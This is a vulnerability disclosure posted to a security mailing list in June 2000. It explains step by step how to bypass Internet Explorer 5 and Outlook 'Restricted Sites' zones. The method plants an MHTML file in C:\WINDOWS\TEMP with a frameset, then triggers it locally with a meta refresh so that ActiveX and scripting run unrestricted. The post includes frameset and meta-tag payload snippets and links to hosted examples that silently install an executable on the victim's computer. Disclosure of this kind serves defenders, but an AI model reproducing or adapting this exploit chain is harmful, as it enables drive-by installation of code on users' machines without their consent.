Re: MICROSOFT SECURITY FLAW?

[http-equiv () excite com (http-equiv () excite com)]

On Thu, 18 May 2000 16:45:20 -0400, Russ wrote:

|  Simply modifying your Outlook (98/2000/OE 5.0) Security setting to
|  "Restricted Sites" shuts this down clean. The ActiveX control cannot be
|  invoked and the user does not have an option to by-pass the security (and
no
|  files, .chm or .exe, are copied down).
|
|  Microsoft's "Outlook Email Security Update" will do this automatically
when
|  its released and applied. Meanwhile, anyone who hasn't already realized
|  their Outlook Security should be set to "Restricted Sites" deserves more
|  than an oolala and a joke...;-]
|
|  Cheers,
|  Russ - NTBugtraq Editor
|  "dot-age" (as in "we're in the dot-age") = senility (source Webster's)

Sunday, June 4, 2000

Thanks your message:

It would appear that setting the so-called Security Zone to "Restricted
Sites" does indeed shut it down quite efficiently. This is owing to the
delivery of the file via ActiveX controls which is disallowed. However,
there is a good possibility that the "Restricted Sites" Zone can be
defeated.

Consider the following:

1. It is understood that the so-called Security Zone settings are only
applied to files that are in the Temporary Internet Files folder. It assumes
that all other files on the computer are safe.

2. If that is the case, in order to defeat the so-called Security Zone
settings, we would need to place our files on the target computer anywhere
except the Temporary Internet Files folder.

Can we do that?

(a) IE5 and accompanying mail and news client can do this for us. Through
them we can inject our files into the temp folder for later retrieval.

How so?

(b) manufacture the file that you wish to place in the target computer's
temp folder. This can be a simple combination ActiveX and ActiveScripting
file which we would like to trigger later, or an elaborate "Silent delivery
and installation of an executable on a target computer" file as detailed in
this thread.

(c) run the file through the mail or news client effectively embedding it in
base64. Thereafter save the file as either *.nws, *.eml or *.mhtml.

(d) we then create a second new html email or html news post and embed the
file that we want to deliver, in it. We do this by creating a simple html
frameset and embed the file to be delivered in that:

<frameset rows="10%,*">
<frame src="FILE_TO_BE_DELIVERED.MHTML" >
</frameset>

(e) we then run this combination of files through the mail or news client
and effectively embed both in base64.

What will happen?

When the combination file is opened, it will read the embedded file
contained within it, through the frames and deposit the file, with full name
intact, into the c:/windows/temp folder, where we can call it later. From
this location we are out of the so-called Security Zone and can do as we
please.

But ActiveScripting is Disabled?

In the second file, along with the html frameset we include the very simple
HTTP-EQUIV meta tag known as refresh.

<meta http-equiv="refresh"content="30;
url=mhtml:file://C:\WINDOWS\TEMP\k00l.mhtml">

What happens is because the file we are calling is located in the
c:/windows/temp folder, we are inside (or outside) any setting of the
so-called  Security Zones. The browser will bounce to our file in the temp
folder and open it locally. Our file in the temp folder can contain all
sorts of goodies including "Silent delivery and installation of an
executable on a target computer". As we are now local, anything and
everything will work, including all ActiveScripting and all ActiveX
controls. The following set of working examples include just that. The first
incorporating an executable (*.exe), the second containing nothing more than
ActiveScripting and an ActiveX control.

These have been tested on IE5.0 and IE5.1 (both updated with all security
patches as of time of writing) with everything disabled in the so-called
Security Zone including ActiveScripting, running of ActiveX controls etc.
Every possible selection under Custom Level set to: DISABLE

[IE5.5 being beta fails. However it raises other curious possibilities when
it is released]

Important Notes:

1. The working examples below represent a generic and diluted approach in
order to keep things simple.
2. The meta refresh tag doesn't work from inside the html email or html news
post. There is a workaround for that. It does of course work in the browser.

3. There is the limitation of having a setTimeout independent of the
ActiveScripting in the files via the meta refresh tag as it could fire
before the files have been delivered.
4. The file name references appear to be extremely sensitive, the examples
should work 99.99% of the time.
5. Again it requires a default  installation of Windows 95 and 98 where the
temp folder is c:/windows/temp.

Working Examples:

1.The first example incorporates a different harmless joke program. It is
quite popular and has not too long ago been added to several Anti-Virus
databases (or signature files).  There is a good possibility that your
Anti-Virus software will disallow the "Silent delivery and installation of
an executable on a target computer" for that reason. There is an even better
chance it will not even know what is happening. This working example is set
to an unnecessary lengthy delay to allow for download on feeble
i-connections. The delay is 30 seconds:

http://members.xoom.com/malware/0uch.mhtml

2. The second is a whimsical example of pure text containing ActiveScripting
and a pre-registered ActiveX control, you'll find the operation of the
ActiveX control in the main browser window and you won't miss the operation
of the ActiveScripting.

note: it is suggested not to test this one if you do not know how to reset
your browser:

http://members.xoom.com/malware/k00l.mhtml

|

_______________________________________________________
Get 100% FREE Internet Access powered by Excite
Visit http://freelane.excite.com/freeisp